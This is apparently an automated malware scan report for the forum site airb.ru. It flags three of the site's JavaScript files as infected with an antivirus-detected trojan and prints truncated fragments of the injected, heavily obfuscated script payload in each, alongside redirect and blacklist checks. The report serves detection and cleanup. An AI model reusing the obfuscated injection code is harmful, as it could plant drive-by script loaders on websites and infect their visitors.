New scan:

Malware Scanner report for airb.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://airb.ru/
200 OK
Content-Length: 14485
Content-Type: text/html
clean
http://airb.ru/javascript/JsHttpRequest/JsHttpRequest.js
200 OK
Content-Length: 17032
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

isDOM = document.getElementById isOpera = isOpera5=window.opera && isDOM isOpera6 = isOpera && window.print isOpera7 = isOpera && document.readyState isMSIE = document.all && document.all.item && !isOpera isMSIE5 = isDOM && isMSIE isNetscape4 = document.layers isMozilla = isDOM && navigator.appName=="Netscape"
function JsHttpRequest(){
var t=this;
t.onreadystatechange=null;
t.readyState=0;
t.responseText=null;
t
... 3377 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://airb.ru/javascript/hints.js
200 OK
Content-Length: 6402
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var currentForum=null, currentTopic=null, clickLeft, clickTop;
window.onload=processHints;
var hintWidth=400;
function processHints() {
document.body.onload=null;
var spans=document.getElementsByTagName('span'), i, currentFirst, currentLast;
var span=document.createElement('span');
span.className ='spaninfo';
var first=span.cloneNode(true);
first.innerHTML='&laquo;';
first.setAttribute('title', LANG.firstTitle);
var last=span.cloneNode(true);
l
... 3236 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://airb.ru/index.php
200 OK
Content-Length: 14485
Content-Type: text/html
clean
http://airb.ru/tools.php?action=help
200 OK
Content-Length: 12821
Content-Type: text/html
clean
http://airb.ru/search.php
200 OK
Content-Length: 6411
Content-Type: text/html
clean
http://airb.ru/tools.php?action=members
200 OK
Content-Length: 7856
Content-Type: text/html
clean
http://airb.ru/loginout.php
200 OK
Content-Length: 5203
Content-Type: text/html
clean
http://airb.ru/register.php
200 OK
Content-Length: 2650
Content-Type: text/html
clean
http://airb.ru/test404page.js
404 Not Found
Content-Length: 351
Content-Type: text/html
clean
http://airb.ru/tools.php?action=rules
200 OK
Content-Length: 15400
Content-Type: text/html
clean
http://airb.ru/profile.php?action=lostpassword
200 OK
Content-Length: 4942
Content-Type: text/html
clean
http://airb.ru/profile.php?action=show&member=1
200 OK
Content-Length: 8327
Content-Type: text/html
clean
http://airb.ru/topic.php?forum=1&topic=11
200 OK
Content-Length: 25942
Content-Type: text/html
clean
http://airb.ru/javascript/board.js
200 OK
Content-Length: 2999
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function PostId(a,postid){
var result = a.href.match(/^(.+\/topic\.php\?forum=\d+\&topic=\d+)/i);
prompt (LANG.ThisPostWWW,result[1]+'&postid='+postid+'#'+ postid);
return false;
}
function Karma(act, userid) {
JsHttpRequest.query('jsloader.php?loader=karma', {action: act, user: userid}, function (data, text) {
alert(text);if (data.error == 0) {var spans = document.getElementsByTagName("SPAN");for (var i=0; i < spans.length; i++) {var span = spans[i];if
... 1416 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Dropped:Trojan.JS.QVC
Ikarus
Trojan.Script
Emsisoft
Dropped:Trojan.JS.QVC (B)
MicroWorld-eScan
Dropped:Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Dropped:Trojan.JS.QVC
GData
Dropped:Trojan.JS.QVC
BitDefender
Dropped:Trojan.JS.QVC


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: airb.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 00:03:53 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0def0a7db67014b5793f7b7a6c290fd9; path=/
Set-Cookie: lastvisit=1421021028; expires=Tue, 12-Jan-2016 00:03:48 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: airb.ru
Referer: http://www.google.com/search?q=airb.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=airb.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://airb.ru/

Result: airb.ru is not infected or malware details are not published yet.